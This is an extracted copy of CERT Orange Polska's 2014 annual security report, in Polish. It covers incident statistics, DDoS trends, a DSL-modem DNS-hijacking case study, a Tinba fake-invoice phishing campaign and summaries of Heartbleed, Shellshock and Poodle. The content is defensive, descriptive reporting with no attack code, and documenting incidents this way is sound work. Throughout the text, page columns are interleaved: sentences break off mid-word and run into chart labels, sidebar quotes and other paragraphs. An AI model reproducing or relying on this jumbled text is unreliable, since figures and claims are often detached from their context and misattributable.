Pobierz Raport

Raport CERT Orange Polska za rok 2014 Raport CERT Orange Polska za rok 2014

Spis treści

Raport powstał we współpracy z Integrated Solutions, 1. Dlaczego powstał raport CERT Orange Polska? 5 dostawcą nowoczesnych rozwiązań ze świata 2. Podsumowanie informacji zawartych w raporcie 7 3. CERT Orange Polska – kim jesteśmy? 9 informatyki i telekomunikacji. 4. Najgroźniejsze podatności 2014 roku na świecie 11 4.1 Okiem partnera – McAfee 11 5. Najważniejsze zagrożenia roku 2014 w sieci Orange Polska 13 5.1 Case study – atak na modemy DSL (luty 2014) 15 5.2 Case study – fałszywe faktury, ataki phishingowe (2. połowa roku) 17 6. Ataki DDoS 19 6.1 Ryzyka związane z atakami DDoS 19 6.2 Statystyki 19 6.3 Okiem partnera – Radware 23 7. Malware 25 7.1 Malware na platformy stacjonarne 27 7.2 Malware na platformy mobilne 30 7.3 Okiem partnera – FireEye 31 8. Skanowania portów i podatności 33 8.1 Skanowania portów 33 8.2 Podatności 35 9. Cyberświat 2015 oczami partnerów Orange Polska 40 10. Komercyjne usługi bezpieczeństwa Orange Polska 44 11. Załączniki 46 11.1 Załącznik 1. Analiza malware WinSpy (na komputery stacjonarne) 47 11.2 Załącznik 2. Analiza malware Emotet (na komputery stacjonarne) 55 11.3 Załącznik 3. Analiza malware NotCompatible.C (na urządzenia mobilne z systemem Android) 59 11.4 Załącznik 4. Analiza podatności Heartbleed 64 11.5 Załącznik 5. Analiza podatności Shellshock 66 11.6 Załącznik 6. Analiza podatności Poodle 71

11.7 Załącznik 7. Inne interesujące podatności 75

2 3 Raport CERT Orange Polska za rok 2014

1. Dlaczego powstał raport CERT Orange Polska?

Ponad 2 miliony klientów stacjonarnych usług szerokopasmowego dostępu do internetu, przeszło 100 tysięcy alertów DDoS, kilkanaście tysięcy incydentów bezpieczeństwa w ciągu roku, niezliczone ilości przejętego i przeanalizowanego złośliwego oprogramowania, 18 lat doświadczenia w dziedzinie bezpieczeństwa IT. Dla Orange Polska bezpieczeństwo teleinformatyczne to istotny element funkcjonowania firmy, stąd ciągły rozwój tej dziedziny. Efektem jest m.in. certyfikacja CERT® dla zespołu reagowania na zagrożenia bezpieczeństwa teleinformatycznego.

Sieć Orange Polska obejmuje swoim zasięgiem około 40% polskiego internetu1, dlatego liczba zdarzeń i incydentów obsłu- giwanych przez CERT Orange Polska pozwala na obserwację trendów oraz wyciąganie wniosków, które można przełożyć na cały krajowy internet. Jako jeden z głównych operatorów telekomunikacyjnych Orange Polska, dzięki działalności swojej jednostki CERT, dysponuje bazą informacji i zdarzeń, które podlegają ciągłej analizie, nierzadko wpływając na bieżące funk- cjonowanie firmy. Zdecydowaliśmy się zatem podzielić tymi informacjami po to, by pokazać spojrzenie na bezpieczeństwo Dla Orange Polska teleinformatyczne oczami operatora.

Niniejsze opracowanie to pierwsze podsumowanie całorocznych działań CERT Orange Polska. Dzisiaj nie można bagate- bezpieczeństwo lizować cyber-zagrożeń – istotna część biznesu i interakcji z aktualnymi lub potencjalnymi klientami dzieje się w sieci, więc siłą rzeczy tam przenosi się także przestępczość. Głęboko wierzę, że Raport CERT Orange Polska pomoże menedżerom w zrozumieniu zagrożeń funkcjonujących w internecie, jak również w podejmowaniu decyzji biznesowych i inwestycyjnych. teleinformatyczne Przydatny będzie także dla wszystkich zainteresowanych internautów. to istotny element funkcjonowania firmy...

Piotr Muszyński Wiceprezes Zarządu ds. Operacyjnych Orange Polska

1 http://www.orange-ir.pl/pl/results-centre/results/2014. 4 5 Raport CERT Orange Polska za rok 2014

2. Podsumowanie informacji zawartych w raporcie

W 2014 roku CERT Orange Polska obsługiwał ok. 1000 Najczęściej atakowane przez cyberprzestępców usługi to incydentów bezpieczeństwa miesięcznie – 39 procent sta- serwery WWW oraz web proxy (port 8080), oprogramo- nowiły zgłoszenia i obserwacje związane z rozpowszech- wanie umożliwiające zdalny dostęp do komputera (Virtual nianiem niechcianej korespondencji (spamu). Największym Network Computing, port 5900) oraz połączenia do baz incydentem był lutowy atak na modemy DSL polskich danych opartych na SQL (MS SQL Server, port 1433). internautów, który swoim zasięgiem objął 100 tysięcy Warto pamiętać, by na bieżąco aktualizować zabezpie- podatnych urządzeń, z czego ok. 50 tysięcy zostało sku- czenia aplikacji łączących się z siecią internet oraz bloko- tecznie zrekonfigurowanych przez atakujących – akcje wać dostęp do nieużywanych portów. Najpopularniejsza podejmowane przez CERT Orange Polska zostały opisa- podatność stwierdzona przez CERT Orange Polska (21 Systemy ochrony przed ne szerzej w raporcie jako studium przypadku cyberataku procent przypadków) to Directory Listing, pozwalająca i przeciwdziałania mu. atakującemu na podejrzenie zawartości katalogów na serwerze – w tym m.in. pliku /etc/passwd/. Systemy ochrony przed atakami DDoS w sieci Orange Pol- atakami DDoS w sieci ska zidentyfikowały w minionym roku ponad 100 tysięcy Najgroźniejsze ubiegłoroczne podatności są dowodem na ostrzeżeń o ruchu noszącym znamiona ataku – to wzrost to, że nawet popularne, dojrzałe oprogramowanie może o blisko 40 procent w porównaniu z 2013 rokiem. CERT zawierać nieodkryte, krytyczne luki bezpieczeństwa. Regu- Orange Polska zanotował znaczny wzrost liczby ataków larne aktualizowanie oprogramowania i instalowanie łat Orange Polska zidentyfikowały wykorzystujących niepoprawnie skonfigurowane serwery bezpieczeństwa to wciąż absolutny obowiązek. Dodatko- (m.in. synchronizacji czasu), pozwalające na skierowanie wo, co jest bardzo ważne zwłaszcza w dużych organiza- w stronę ofiary odpowiedzi większej nawet kilkaset razy cjach, zalecane jest stosowanie strategii defense-in-depth w minionym roku ponad od pakietu inicjującego atak. Średnie szczytowe natężenie oraz ograniczanie powierzchni ataku poprzez wyłączanie ataku odnotowane przez CERT Orange Polska to ok. 900 zbędnych usług i programów. Wzrost liczby podatności Mbps. Największy wolumen zaobserwowanego w sieci w systemach Unix/Linux sugeruje znaczny wzrost zaintere- Orange Polska ataku to 93 Gbps (gigabitów na sekundę) sowania cyberprzestępców tymi systemami i może ozna- 100 tysięcy ostrzeżeń o ruchu oraz 50 Mpps (milionów pakietów na sekundę). Od kilku czać wzrost liczby ataków w 2015 roku. lat utrzymuje się tendencja do dywersyfikacji celów ataków z jednoczesnym skracaniem czasu ich trwania. Jeśli chodzi o trendy na 2015 rok, w związku z dynamicz- nym rozrostem Internet of Things, CERT Orange Polska noszącym znamiona ataku Analiza stwierdzonych w sieci przypadków złośliwego oraz partnerzy raportu przewidują wzrost liczby ataków oprogramowania wykazała, że dużą popularnością cieszą na nowe rodzaje urządzeń korzystających z dostępu do się tzw. bankery – złośliwe oprogramowanie wykradające internetu. Ataki APT będą coraz bardziej wyrafinowane, dane logowania do systemów e-bankowości – oraz mal- pojawią się w nich m.in. znane do tej pory z produkcji hol- ware ukierunkowany na ataki APT (Advanced Persistent lywoodzkich mechanizmy samozniszczenia, co poważnie Threat), szerzej opisany przez jednego z partnerów niniej- utrudni wykrywanie sprawców. Jednego można być pew- szego raportu. Ciekawsze przypadki malware eksperci nym – bezpieczeństwo teleinformatyczne w 2015 roku na CERT Orange Polska poddali dokładnej analizie, która pewno nie straci na znaczenia. zostałą przedstawiona w załącznikach zamieszczonych w końcowej części raportu.

7 Raport CERT Orange Polska za rok 2014

3. CERT Orange Polska – kim jesteśmy?

Orange Polska (dawniej Telekomunikacja Polska S.A.) W codziennej pracy CERT Orange Polska współpracuje przykłada dużą wagę do bezpieczeństwa teleinformatycz- na szczeblu operacyjnym z krajowymi i międzynarodowymi nego już od 1997 roku, gdy w strukturze firmy powstała organizacjami skupiającymi jednostki o podobnym profi- pierwsza odpowiedzialna wyłącznie za ten aspekt jednost- lu działalności. Jest jednym z dwóch krajowych zespołów ka. W 2006 roku – jako trzecia jednostka w Polsce i obec- akredytowanych w ramach inicjatywy Trusted Introducer, nie jedyny operator telekomunikacyjny – otrzymaliśmy działającej przy europejskiej organizacji TERENA TF-CSIRT prawo do używania nazwy CERT® (Computer Emergency (zrzeszającej ponad 200 jednostek CERT w Europie). Response Team). Jest ono przyznawane przez Carnegie Uczestniczy również w pracach największej organizacji Mellon University (CERT.org) wyłącznie zespołom spełnia- zrzeszającej światowe CERTy – FIRST (Forum of Incident jącym wyśrubowane wymagania dotyczące obsługi zagro- Response and Security Teams). żeń związanych z cyberbezpieczeństwem i reagowania na te zagrożenia. Orange Polska jest strategicznym partnerem renomowa- nych dostawców rozwiązań bezpieczeństwa, takich jak Operatorzy CERT Orange Polska (I linia wsparcia) pracują McAfee, Cisco, Fortinet czy BlueCoat, tworząc z nimi roz- w trybie 7/24/365, monitorując poziom bezpieczeństwa wiązania z zakresu cyberbezpieczeństwa (m.in. zapewniają- Nasi klienci niejednokrotnie użytkowników naszej sieci, przyjmując zgłoszenia, reagu- ce ochronę przed atakami na infrastrukturę własną i klienc- jąc na zidentyfikowane incydenty bezpieczeństwa i podej- ką). Od wielu lat współpracujemy także z innymi wiodącymi mując działania zmierzające do minimalizacji zagrożeń. dostawcami rozwiązań bezpieczeństwa: HP, FireEye, EMC, Zespoły analityków oraz ekspertów (II i III linia wsparcia) Check Point, Arbor Networks, Radware, czy Crossbeam. mogli już się przekonać, wspierają codzienną pracę linii operacyjnej w przypadku wystąpienia bardziej złożonych zdarzeń, nieujętych w pro- W ramach usług komercyjnych Orange Polska, m.in. dzięki cedurach reagowania na incydenty standardowe. Są rów- wykorzystaniu kompetencji CERT Orange Polska, wdrożył że dbamy o ich bezpieczeństwo nież odpowiedzialne za przeprowadzanie analiz zagrożeń, szereg projektów w Polsce i w Europie, w tym: DDoS Pro- optymalizację procesu obsługi standardowych incydentów tection, RiverBed MS (firma z branży ubezpieczeniowej), bezpieczeństwa oraz rozwój narzędzi detekcji i minimalizacji SIEM (duże instytucje bankowe, content service provider) zagrożeń. Takie wielopoziomowe podejście do organizacji oraz przeprowadziła testy i audyty bezpieczeństwa dla o każdej porze dnia i nocy. zespołu reagowania pozwala na efektywne wykorzystanie klientów, również zagranicznych, z wielu branż. zasobów osobowych i technologicznych przy jednoczesnej Na witrynie internetowej http://cert.orange.pl/ można zna- optymalizacji kosztów funkcjonowania. Nasi klienci niejed- leźć alerty bezpieczeństwa oraz inne istotne informacje, nokrotnie mogli się przekonać, że dbamy o ich bezpieczeń- a także bazę wiedzy i szereg poradników, zaś na witrynie stwo o każdej porze dnia i nocy. http://blog.orange.pl regularnie publikowane są informacje dotyczące bezpieczeństwa IT, głównie budujące świado- 1997 2005 2006 2010 2013 mość bezpiecznych zachowań w sieci.

Abuse TP SA Abuse TP SA TP CERT TP SOC CERT OPL (Polpak) SOC komercyjny SOC OPL

Raport przygotowany przez CERT Orange Polska Adres do kontaktu w sprawie raportu: [email protected] Kontakt z CERT Orange Polska cert.orange.pl [email protected]

9 Raport CERT Orange Polska za rok 2014

4. Najgroźniejsze podatności 2014 roku na świecie

Analitycy McAfee zauważyli w minionym roku znaczne nasilenie zjawiska wyko- W 2014 roku opublikowano informację o wielu podatno- Oznacza to, że liczba podatnych systemów jest wysoka. rzystywania popularności legalnych aplikacji w rozprzestrzenianiu mobilnego ściach. Na część z nich warto zwrócić szczególną uwagę Dodatkowo, atak za pośrednictwem Shellshock jest łatwy złośliwego oprogramowania. Ciekawym przykładem takiej taktyki był klon popu- ze względu na ich groźny charakter. do wykonania nawet automatycznie, a do jego przeprowa- larnej gry mobilnej Flappy Birds. Według McAfee Labs aż 79% klonów gry Flap- Jedną z najczęściej przytaczanych i najdokładniej opisy- dzenia nie potrzeba dużej wiedzy. py Birds (również tych dostępnych w legalnych sklepach z oprogramowaniem, wanych w minionym roku luk był Heartbleed – podatność zanim zostały stamtąd usunięte) zawierało wirusy! Instalacja takiej aplikacji przez odkryta w pakiecie OpenSSL pozwalająca na odczytanie Poodle to luka w SSL protokole zabezpieczania transmisji użytkownika umożliwiała cyberprzestępcom m.in. wykonywanie połączeń tele- fragmentów pamięci atakowanego procesu, a w konse- sieciowych. W połączeniu z innymi machinacjami atakują- fonicznych bez wiedzy użytkownika, instalowanie dodatkowych aplikacji, uzy- kwencji często prywatnego klucza, co pozwala na odszy- cy może ją wykorzystać, by uzyskać możliwość odczytu skanie dostępu do listy kontaktów, śledzenie położenia telefonu i nieograniczoną frowanie treści przechwyconego komunikatu. Może to danych zabezpieczonych przez szyfrowanie tym protoko- kontrolę nad danymi w urządzeniu, w tym nad zapisywaniem, wysyłaniem i otrzy- oznaczać np. możliwość śledzenia i rejestrowania interakcji łem. Podatność dotyczy wszystkich pakietów oprogramo- mywaniem wiadomości SMS. w programie pocztowym lub przechwycenia wpisywane- wania wspierającego protokół SSLv3. go loginu i hasła (np. do banku). Biblioteki SSL, w których Wniosek? Nawet rozprzestrzenione i – wydawać by się Raporty McAfee Labs wskazują na kilka przykładów wykorzystania funkcji zaufa- wykryto podatność, były niezwykle popularne – w chwili mogło – dojrzałe oprogramowanie może zawierać nieod- nych aplikacji i usług przez mobilne złośliwe oprogramowanie, np.: publikowania informacji luka dotyczyła około pół miliona kryte krytyczne luki bezpieczeństwa. Dlatego oprócz utrzy- • Android/BadInst.A: działających w sieci serwerów WWW. Luka była również mywania aktualnych wersji oprogramowania zalecane jest Ta złośliwa aplikacja mobilna działa w obszarze uwierzytelnienia i autoryzacji bardzo łatwa do wykorzystania. W opracowaniu amery- stosowanie kilku warstw zabezpieczeń (strategia defense- konta w App Store w celu automatycznego pobierania, instalowania i urucha- kańskiego repozytorium National Vulnerability Database -in-depth) oraz ograniczanie skuteczności potencjalnego Sebastian Zamora miania aplikacji bez zgody użytkownika. uzyskała w tej kategorii ocenę 10/10 w punktacji CVSS ataku przez wyłączanie zbędnych usług i programów. Channel Account Manager – McAfee • Android/Waller.A: (Common Vulnerability Scoring System – Wspólny System Wykorzystuje lukę w legalnej usłudze cyfrowego portfela w celu przejęcia kon- Oceniania Podatności). Na przykładzie ataków opartych na luce Shellshock można troli nad protokołem przekazów pieniężnych i przeniesienia środków na serwery zauważyć, że systemy Unix, Linux oraz inne wykorzystują- atakującego. Podatność Shellshock została upubliczniona 24 września ce powłokę bash mogą stanowić cele również dla autorów • Android/Balloonpopper.A: 2014 roku. Polega ona na tym, że program bash umożli- robaków, którzy do tej pory oszczędzali je ze względu na Korzysta z luki w metodzie szyfrowania popularnego komunikatora WhatsApp, wia atakującemu wykorzystanie treści, która powinna być wiele różnic między poszczególnymi dystrybucjami. Tym- umożliwiając atakującemu przechwycenie i udostępnienie konwersacji i zdjęć interpretowana jako dane, w charakterze kodu wykony- czasem z powodu charakteru luki różnice te okazały się bez zgody użytkownika. walnego. W efekcie atakujący może za pośrednictwem nieistotne, a systemy serwerowe stały się celem ataków zmiennych środowiskowych przekazać do programu pole- typowych dla jednorodnych systemów klienckich, takich – Mamy zaufanie do marek i nazw, które znamy z internetu. Kiedy bardzo chce- cenie, które ten następnie wykona. Shellshock jest jedną jak np. systemy rodziny Windows. my coś mieć, często nasza czujność jest uśpiona i bezwiednie godzimy się na z najbardziej niebezpiecznych luk zaobserwowanych od Zainteresowanych szerszą analizą opisanych podatności czyhające zagrożenia – mówi Vincent Weafer, Senior Vice President McAfee lat, a to dlatego, że bash, jako ulubiona powłoka wielu zapraszamy do lektury załączników od 4. do 7. umiesz- Labs. – Rok 2014 pokazał już w sposób wyraźny, że twórcy mobilnego złośli- administratorów systemowych, bardzo często jest wybie- czonych na końcu raportu. wego oprogramowania wykorzystują tę właśnie skłonność. Programiści muszą rana jako domyślna dla systemów klasy Linux czy Unix. koniecznie usprawnić zabezpieczenia wbudowywane w tworzone przez nich aplikacje, a użytkownicy powinni z większą ostrożnością podchodzić do udziela- nia zgody w ramach ich używania – ostrzega Weafer.

4.1 Okiem partnera – McAfee

11 Raport CERT Orange Polska za rok 2014

5. Najważniejsze zagrożenia 2014 roku w sieci Orange Polska

Wykres 1. W 2014 roku zespół CERT Orange Polska obsłużył 11 379 Mimo faktu, że zagrożenia wynikające ze spamu są znane Rozkład procentowy typów incydentów bezpieczeństwa, w których źródłem bądź od wielu lat, a na rynku jest dostępnych sporo narzędzi Spam 39% incydentów obsłużonych celem ataku była sieć usługowa Orange Polska. Informacje i usług umożliwiających jego minimalizację, stanowi on przez CERT Orange Polska o incydentach pochodziły zarówno ze źródeł zewnętrz- nadal znaczący problem dla użytkowników sieci internet. Z jednej strony do skrzynek poczty elektronicznej DDoS 28% nych, jak i alertyów z wewnętrznych systemów bezpie- trafia mnóstwo niechcianej korespondencji, z drugiej zaś czeństwa. – część korespondencji, której użytkownik oczekuje, filtry Typy incydentów obsłużonych przez zespół CERT Oran- Próby włamań 20% zabezpieczające traktują jako spam i przenoszą do folde- ge Polska w 2014 roku w rozkładzie procentowym przed- rów z niechcianą pocztą, co utrudnia ich skuteczne dotar- Malware 7% stawiono na wykresie 1, poniżej szczegółowo opisano cie do odbiorcy. Dodatkowo wykorzystywana przez ata- typ incydentu poszczególne kategorie. Kategorie oparte są na typie kujących możliwość podszywania się pod adres nadawcy i skutku działań naruszających bezpieczeństwo, związa- korespondencji wysyłanie bez jego wiedzy i zgody wiado- Phishing URL 1% nych z procesem ataku na system teleinformatyczny i jego mości e-mail ze złośliwą zawartością powodują, że adres wykorzystaniem. >> Wykres 1. zaatakowanego nadawcy może trafić na oficjalne listy Inne 5% • Spam spamerskie. Efektem jest blokada możliwości wysyłania wysyłanie niechcianej poczty elektronicznej z urządzeń i otrzymywania korespondencji elektronicznej dla zaata- udział procentowy pracujących w sieci Orange Polska lub do użytkowni- kowanego adresu e-mail, a nierzadko również dla całej ków sieci Orange Polska domeny. • DDoS rozproszone ataki blokujące usługę, których jednym ze Zgłoszenia otrzymane przez CERT Orange Polska doty- Wykres 2. źródeł bądź celem było urządzenie użytkownika sieci czące każdego z rodzajów uciążliwości związanej ze spa- Liczba incydentów obsłużonych 1400 Orange Polska mem są podejmowane do analizy i realizacji przez ope- przez CERT Orange Polska • Próby włamań ratorów zgodnie z obowiązującymi procedurami obsługi. 1200 w skali miesiąca próby uzyskania nieautoryzowanego dostępu do sys- Dzięki temu, że marka CERT Orange Polska jest rozpo- 1000 temu (np. zgadywanie haseł), których źródłem lub znawana na rynku zarówno krajowym, jak i zagranicznym, 800 celem było urządzenie użytkownika sieci Orange Polska zgłoszenia przekazywane przez naszych operatorów m.in. • Malware do jednostek odpowiedzialnych za aktualizację tzw. black 600 rozpowszechnianie złośliwego oprogramowania (np. list są przez te organizacje realizowane priorytetowo. 400 umożliwienie hostowania złośliwej strony internetowej), W podobny sposób współpracują z CERT Orange Polska

liczba incydentów których źródłem było urządzenie użytkownika sieci 200 firmy świadczące usługi hostingowe – w przypadku zgło- Orange Polska szenia przez operatora CERT do firmy hostingowej infor- 0 • Phishing URL macji o wykryciu serwisu wysyłającego wiadomości typu nik luty maj lipiec umożliwianie hostowania przez urządzenia użytkowni- spam serwis taki jest blokowany przez hostującego. marzec styczeń sierpień listopad grudzień kwiecień wrzesień czerwiec ków sieci Orange Polska fałszywej strony, wyłudzającej paździer Z uwagi na zwiększoną dostępność rozwiązań – a w ostat- miesiąc poufne informacje nim czasie również dedykowanych usług – umożliwiających • Inne przeprowadzanie ataków DDoS do operatorów CERT m.in. przechwytywanie bądź modyfikowanie informa- coraz częściej trafiają zgłoszenia dotyczące tego zagro- cji, rozpowszechnianie treści zabronionych prawem żenia. Tą drogą pozyskiwana jest niewielka część infor- (pornografia dziecięca, handel narkotykami etc.) i nie- macji o atakach DDoS – podstawowym źródłem informacji bezpiecznych (z wyłączeniem spamu, umieszczone- o atakach na klientów sieci Orange Polska są dedykowane go w oddzielnej kategorii) oraz oszustw sieciowych temu celowi systemy monitorowania umożliwiające także (z wyłączeniem phishingu URL) minimalizację zagrożenia. Celami ataków są nie tylko duże organizacje np. świadczące usługi bankowości elektro- Poniżej liczba incydentów obsłużonych przez CERT Oran- nicznej, choć takie ataki najczęściej są szeroko komen- ge Polska w skali miesiąca. Średnio w miesiącu obsługiwa- towane w środkach masowego przekazu, gdyż dotykają nych było blisko 1 000 incydentów. w jednym czasie wielu użytkowników usług bankowych. >> Wykres 2.

12 13 Raport CERT Orange Polska za rok 2014

5.1 Case study – atak na modemy DSL (luty 2014)

Ataki DDoS są dedykowane przede wszystkim na klientów przejmują oni dzięki malware kontrolę nad komputerem W lutym 2014 roku nastąpił zmasowany atak na modemy sprzedaży Orange Polska, mających lukę bezpieczeń- usług takich jak Neostrada czy Internet DSL. Ich wysoki ofiary i wydają mu polecenia realizowania nieuprawnionych użytkowników szerokopasmowego dostępu do internetu stwa, zostały podmienione adresy DNS. Zablokowanie wolumen, nierzadko przekraczający 3 Gbps, bez podję- działań. (m.in. firm TP-Link, Pentagram, D-Link), polegający na uzy- tych adresów pozwoliło na zabezpieczenie klientów cia mitygacji przez CERT Orange Polska niejednokrotnie W kategorii „Malware” ujęte zostały działania prowadzone skaniu dostępu do konfiguracji backupu i podmianie DNS- przed działaniami atakujących, jednak spowodowa- nie pozostawałby bez wpływu na dostępność usług dla przez CERT Orange Polska dotyczące identyfikacji, analizy -ów na takie, które przekierowują ruch na fałszywe strony ło jednocześnie uniemożliwienie korzystania z usług innych klientów podłączonych do tych samych węzłów oraz ograniczania rozprzestrzeniania się malware na sta- banków. Urządzenia pochodzące z sieci sprzedaży Oran- dostępu do sieci internet. sieciowych co atakowany użytkownik. Dlaczego klienci cje użytkowników sieci Orange Polska, a także czynności ge były przed tego typu atakami zabezpieczone, ryzyko • 5 lutego zespół CERT Orange Polska wypracował detaliczni padają ofiarami ataków DDoS? Głównie dlatego, związane z ograniczeniem możliwości komunikacji zainfe- dotyczyło urządzeń kupionych na wolnym rynku, z których rozwiązanie umożliwiające zapewnienie bezpiecznego że korzystają z możliwości prowadzenia gier on-line. Prze- kowanych stacji z serwerami C&C. korzysta wielu naszych klientów. W wyniku tych ataków dostępu do sieci internet dla klientów Orange Polska ciwnik, chcąc „uśmiercić” gracza lub przejąć jego zaso- Phishing, jeśli patrzy się od strony ilościowej, powinien sta- CERT Orange Polska podjął natychmiastowe działania: z zainfekowanymi modemami. Wykonano tzw. sinkho- by, zamawia na adres IP ofiary usługę ataku DDoS, który nowić śladowe zagrożenie, wciąż jednak zagraża użytkow- • 4 lutego 2014 roku w godzinach wieczornych CERT ling (przekierowanie ruchu na adresy IP serwerów DNS potrafi skutecznie ograniczyć dostępność sieci internet dla nikom sieci internet. Na skutek tego typu ataków poufne Orange Polska w porozumieniu z zagrożonymi insty- Orange Polska z jednoczesną analizą złośliwego ruchu niego w tym czasie – taki atak można kupić już za kilkana- dane użytkowników mogą się dostać w niepowołane ręce, tucjami finansowymi oraz Związkiem Banków Pol- przez CERT Orange Polska), co pozwoliło klientom ze ście dolarów. Pozwala on wykonać w wirtualnym świecie a ich wykorzystanie może przysporzyć właścicielowi wielu skich zablokował adresy DNS (fake DNS) kierujące zmienionymi adresami DNS odzyskać dostęp do sieci zamierzone przez atakującego działania. kłopotów, łącznie z kradzieżą pieniędzy z kont bankowych, ruch użytkowników na spreparowane fałszywe strony internet. Zdecydowano też o przeprowadzeniu etapa- utratą dostępu do treści zamieszczonej w sieciach spo- internetowe bankowości elektronicznej. W momencie mi przekierowania zainfekowanych użytkowników na Zgłoszenia ujęte w kategorii „Próby włamań” dotyczą łecznościowych lub w poczcie elektronicznej oraz kon- blokowania adresów nie było jeszcze możliwe oszaco- dedykowaną stronę WWW z ostrzeżeniem o zagro- głównie działań związanych z podejrzeniem prób przeła- troli nad tymi treściami. Przeciwdziałając atakom, CERT wanie skali zagrożenia. Po zablokowaniu „fake DNS” żeniu oraz narzędziem i instrukcją do wprowadzenia mania zabezpieczeń w systemach dokonywanych przez Orange Polska przede wszystkim uniemożliwia nawiąza- gwałtownie wzrosła liczba połączeń klientów z Biurem poprawnych parametrów konfiguracyjnych w route- użytkowników sieci Orange Polska. W przeważającej czę- nie połączenia przez użytkowników sieci Orange Polska Obsługi Klienta Orange Polska, związanych z reklama- rach, co pomogło w minimalizowaniu zagrożenia. ści odpowiedzialność za to – jak i za działania dotyczące z serwisami wyłudzającymi informacje. Dodatkowo CERT cją braku dostępności usług Neostrada oraz Internet Choć potencjalnie zagrożone były 94 tysiące klien- wysyłania spamu oraz uczestnictwo komputerów osobi- Orange Polska współpracuje z podmiotami hostującymi DSL, co znacznie wydłużyło czas oczekiwania na połą- tów Orange Polska (liczbę zaatakowanych mode- stych użytkowników sieci w atakach DDoS – ponosi mal- usługi serwisów webowych – na jego wniosek serwisy czenie z Biurem Obsługi Klienta bądź nawet je wyklu- mów oszacowano na 44 tysiące), trzeba zaznaczyć, ware, którym zainfekowane są stacje robocze użytkow- internetowe wyłudzające informacje są blokowane, sta- czało. że atak prowadzony był również na innych polskich ników. Komputery takie bez wiedzy i zgody użytkownika jąc się niedostępnymi dla wszystkich użytkowników sieci • Zespół CERT Orange Polska po otrzymaniu powyższej operatorów. stają się narzędziami w rękach przestępców. Za pośred- internet, również będących klientami innych operatorów informacji przeprowadził analizę sytuacji i ustalił, że nictwem tzw. serwerów C&C (Command and Control), telekomunikacyjnych. w modemach kupionych przez klientów poza siecią Rysunek 1 poniżej przedstawia proces ataku.

1 Atakujący pobierają konfigurację 1 podatne modemy z podatnego modemu. 2 użytkowników/ klientów 2 Atakujący ustawiają adresy serwerów DNS na fałszywe.

3 Użytkownicy próbują się dostać do bankowości intemetowej sieć OPL – ich komputery wysyłają zapytania o adresy IP e-banków do fałszywych atakujący serwerów DNS-ów. 3 internet 4 5 4 Fałszywe DNS-y kierują użytkowników do podstawionych serwisów bankowości internetowej.

5 Użytkownicy próbują się zalogować na swoje konta w serwisach bankowości internetowej, podają atakującym swoje loginy, hasła oraz inne dane potrzebne do uwierzytelnienia. podstawione (fałszywe) Atak może być również serwery DNS podstawione serwisy WWW, wykorzystany do przejęcia np. bankowość internetowa komputerów użytkowników autentyczne serwisy WWW, w celu stworzenia botnetu np. bankowość internetowa do wykonywania np. ataków DDoS lub spamowych.

Rysunek 1. Proces ataków na modemy DSL

14 15 Raport CERT Orange Polska za rok 2014

Powyższa liczba przejętych i podatnych modemów DSL bankowości elektronicznej, witryny rządowe, infrastruktu- w analizowanym okresie. Pod koniec lutego liczba przeję- rę dowolnego operatora telekomunikacyjnego etc.), tych i podatnych modemów została znacząco ograniczo- • ataków spamowych – wysyłka wiadomości e-mail na, a do 26 marca 2014 roku podatność została usunięta zawierających reklamy, informacje wyłudzające dane Wykres 3. 100 000 i przestała stanowić zagrożenie w sieci Orange Polska. lub np. wysłanie ogromnej liczby wiadomości na jeden Liczba podatnych i przejętych 90 000 >> Wykres 3. adres e-mail, skutkujące jego niedostępnością, modemów DSL w analizowanym • ataków phishingowych i pharmingowych (przekie- 80 000 okresie Reakcja CERT Orange Polska pomogła w skutecznym rowanie użytkownika na podstawioną stronę WWW 70 000 zabezpieczeniu klientów Orange Polska przed konse- mimo wpisania prawidłowego adresu) – pozyskiwa- 60 000 kwencjami ataku. Zablokowała również cyberprzestęp- nie poufnych danych użytkowników (loginy, hasła do 50 000 com szansę przejmowania i infekowania komputerów oraz kont bankowych, kont e-mail, dostępu do portali) oraz liczba 40 000 wykorzystania ich do stworzenia botnetu umożliwiającego przejęcie środków pieniężnych z kont bankowych

30 000 przeprowadzenie na przykład: użytkowników. • ataków DDoS na dowolne usługi internetowe (np. usługi 20 000

10 000 0 5.2 Case study – fałszywe faktury, ataki phishingowe (2. połowa roku) 07/02 08/02 09/02 10/02 11/02 12/02 13/02 14/02 15/02 16/02 17/02 18/02 19/02 20/02 21/02 22/02 23/02 24/02 25/02 26/02 27/02 28/02 01/03 02/03 03/03 data

podatne modemy przejęte modemy Od początku wakacji polscy internauci stali się obiektem • uzyskano nazwy domen oraz adresy IP serwerów kon- ataku phishingowego przeprowadzanego przy użyciu maili trolujących botnet, z załącznikiem przypominającym faktury za usługi teleko- • ruch z sieci Orange Polska do szkodliwych adresów po munikacyjne. Wysyłane maile dotyczyły znacznej części ich zidentyfikowaniu został natychmiast zablokowany, operatorów telekomunikacyjnych (w tym Orange Polska). • nawet w przypadku infekcji złośliwe oprogramowanie Do CERT Orange Polska napłynęły w lipcu i w sierpniu zgło- nie mogło się komunikować z centrum zarządzania szenia klientów dotyczące fałszywych maili tego typu. i nie powodowało szkód u użytkowników, CERT Orange Polska otrzymał informacje i próbki złośliwe- • informacja na temat postępowania w przypadku otrzy- go oprogramowania z wielu źródeł, a następnie poddał je mania tego typu korespondencji została przekazana szczegółowej analizie. W kolejnych krokach: do Biura Obsługi Klienta i mediów, • złośliwy kod został zidentyfikowany jako odmiana tro- • opublikowano szereg informacji w serwisie jana Tiny Banker (Tinba), blog.orange.pl oraz cert.orange.pl.

Rysunek 2. Mail phishingowy

16 17 Raport CERT Orange Polska za rok 2014

6. Ataki DDoS

Ataki odmowy dostępu do usługi (Distributed Denial of nio spreparowanymi wywołaniami. Ddla każdego z nich Wykres 4. Service – DDoS) są jednymi z najprostszych i najbardziej atakowany obiekt przydziela pamięć, czas procesora czy wysoki średni niski Liczba alertów DDoS w podziale popularnych ataków na sieć lub system komputerowy pasmo sieciowe. Przy bardzo dużej liczbie żądań prowadzi na poziom krytyczności 800 (np. aplikacje i usługi dostępne z poziomu sieci internet), to do błyskawicznego wyczerpania dostępnych zasobów 700 600 a zarazem jednymi z bardziej groźnych. infrastruktury. Z tego powodu dochodzi do przerwy w dzia- 500 400 Ich głównym celem jest utrudnienie lub uniemożliwienie łaniu lub nawet do uszkodzenia systemu. W przypadku 300 200 dostępu do usług sieciowych. Przebieg ataku to zwykle ataku na łącze sieciowe celem zazwyczaj jest zajęcie całej liczba alertów 100 zalewanie (ang. flooding) atakowanego obiektu odpowied- dostępnej przepustowości łącza. 0

